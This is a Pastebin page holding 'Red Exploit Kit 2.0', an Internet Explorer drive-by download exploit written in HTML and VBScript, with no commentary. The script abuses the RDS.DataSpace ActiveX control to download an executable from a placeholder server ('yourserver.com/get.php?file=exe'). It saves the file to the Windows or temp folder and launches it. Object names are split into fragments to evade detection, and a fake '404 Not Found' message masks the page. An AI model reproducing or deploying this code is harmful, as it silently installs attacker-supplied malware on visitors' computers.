API tools faq
paste
Advertisement
xanda

Red Exploit Kit 2.0

xanda
Sep 26th, 2012
681
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 4.19 KB | None | 0 0
raw download clone embed print report
  1. // Red Exploit Kit 2.0
  2.  
  3.  
  4.  
  5.  
  6. <HTML xmlns:IE>
  7. <body>
  8.  
  9.  
  10. <SCRIPT language="VBScript">
  11.    
  12. Module_Path="http://yourserver.com/get.php?file=exe"
  13.  
  14.    If navigator.appName="Microsoft Internet Explorer" Then
  15.            
  16.       If InStr(navigator.platform,"Win32") <> 0  Then
  17.      
  18.       Const ssfFONTS=20
  19.       Const adModeReadWrite=3
  20.       Const adTypeBinary=1
  21.       Const adSaveCreateOverWrite=2
  22.        
  23.       Dim  oRDS
  24.       Dim  oXMLHTTP
  25.       Dim  oFSO
  26.       Dim  oStream
  27.       Dim  oWShell
  28.       Dim  oShellApp
  29.      
  30.       Dim  WinDir
  31.       Dim  ExeName
  32.       Dim  XMLBody
  33.       Dim  PluginFile
  34.       Dim  cByte
  35.       Dim   ObjName
  36.       Dim   ObjProg
  37.      
  38.       Randomize
  39.  
  40.       ExeName=GenerateName()
  41.       ExeName=ExeName & ".exe"
  42.  
  43.       cls1="clsid:BD96"
  44.       cls2="C556-65A"
  45.       cls3="3-11D0-9"
  46.       cls4="83A-00C04FC29E36"
  47.       clsfull=cls1&cls2&cls3&cls4
  48.  
  49.       Set  oRDS=document.createElement("object")
  50.       oRDS.setAttribute "id","oRDS"
  51.       oRDS.setAttribute "classid",clsfull
  52.      
  53.       Set oShellApp = oRDS.CreateObject("Shell.Application","")
  54.       Set oFolder = oShellApp.NameSpace(ssfFONTS)
  55.       Set oFolderItem=oFolder.ParseName("Symbol.ttf")
  56.       Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
  57.      WinDir= Font_Path_Components(0) & "\" &  Font_Path_Components(1) & "\"
  58.      ExeName=WinDir & ExeName
  59.                  
  60.      ObjName="Microsoft"
  61.      ObjProg="XMLHTTP"
  62.      set oXMLHTTP = CreateObject(ObjName & "." & ObjProg)
  63.      Req_type="G" & "E" & "T"
  64.      HTTPSession=oXMLHTTP.Open(Req_Type,Module_Path,0)
  65.      oXMLHTTP.Send()
  66.      On Error Resume Next
  67.      XMLBody=oXMLHTTP.responseBody
  68.    
  69.      ObjName="ADODB"
  70.      ObjProg="Stream"
  71.      On Error Resume Next
  72.      Set oStream=oRDS.CreateObject(ObjName & "." & ObjProg,"")
  73.      If Err.number <> 0 Then
  74.        
  75.            Set oFSO=oRDS.CreateObject("Scripting.FileSystemObject","")
  76.            Set PluginFile=oFSO.CreateTextFile(ExeName, TRUE)
  77.            Plugin_size=LenB(XMLBody)
  78.  
  79.            For j=1 To Plugin_size
  80.                cByte=MidB(XMLBody,j,1)
  81.                ByteCode=AscB(cByte)
  82.                PluginFile.Write(Chr(ByteCode))
  83.            Next
  84.            PluginFile.Close
  85.      
  86.            Set  oWShell=oRDS.CreateObject("WScript.Shell","")
  87.            On Error Resume Next
  88.            oWShell.Run (ExeName),1,FALSE
  89.      Else
  90.            oStream.Mode=adModeReadWrite
  91.            oStream.Type=adTypeBinary
  92.            oStream.Open
  93.            oStream.Write XMLBody
  94.            oStream.SaveToFile ExeName,adSaveCreateOverWrite
  95.            
  96.            oShellApp.ShellExecute ExeName
  97.      End If
  98.            
  99.            
  100.      End If
  101.   End If  
  102.  
  103. Function GenerateName()
  104. RandomName=""
  105. rr=Int(8*Rnd)
  106. ik=0
  107. Do
  108.  ii=Int(25*Rnd)+97
  109.  RandomName=RandomName+Chr(ii)
  110.  ik=ik+1
  111. Loop While ik<rr
  112. GenerateName=RandomName
  113. End Function
  114.  
  115. </SCRIPT>
  116.  
  117. <script language="VBScript">
  118.    on error resume next
  119.    dl = "http://yourserver.com/get.php?file=exe"
  120.     Set df = document.createElement("object")
  121.  
  122.       cls1="clsid:BD96"
  123.       cls2="C556-65A"
  124.       cls3="3-11D0-9"
  125.       cls4="83A-00C04FC29E36"
  126.       clsfull=cls1&cls2&cls3&cls4
  127.  
  128.  
  129.     df.setAttribute "classid",clsfull
  130.  
  131.     strr1="Mic"
  132.     strr2="roso"
  133.     strr3="ft."
  134.     strr4="XML"
  135.     strr5="HTTP"
  136.     strr=strr1&strr2&strr3&strr4&strr5
  137.  
  138.     Set x = df.CreateObject(strr,"")
  139.     ab1="A"
  140.     ab2="dod"
  141.     ab3="b.S"
  142.     ab4="t"
  143.     ab5="re"
  144.     ab6="am"
  145.     strb1=ab1&ab2&ab3&ab4&ab5&ab6
  146.     strb5=strb1
  147.     set YY = df.createobject(strb5,"")
  148.     YY.type = 1
  149.     str6="GET"
  150.     x.Open str6, dl, False
  151.     x.Send
  152.     fnamezz1="update.exe"
  153.  
  154.  
  155.     scripp1="Scrip"
  156.     scripp2="ting"
  157.     scripp3=".Fil"
  158.     scripp4="eSyste"
  159.     scripp5="mObject"
  160.     scripp=scripp1&scripp2&scripp3&scripp4&scripp5
  161.  
  162.     set FF = df.createobject(scripp,"")
  163.     set tmp = F.GetSpecialFolder(2)
  164.     fnamezz1= FF.BuildPath(tmp,fnamezz1)
  165.  
  166.  
  167.     YY.open
  168.     YY.write x.responseBody
  169.     YY.savetofile fnamezz1,2
  170.     YY.close
  171.     set MM = df.createobject("Shell.Application","")
  172.     MM.ShellExecute fnamezz1,"","","open",0
  173. </script>
  174. 404 Not Found
  175.  
  176. </body>
  177. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!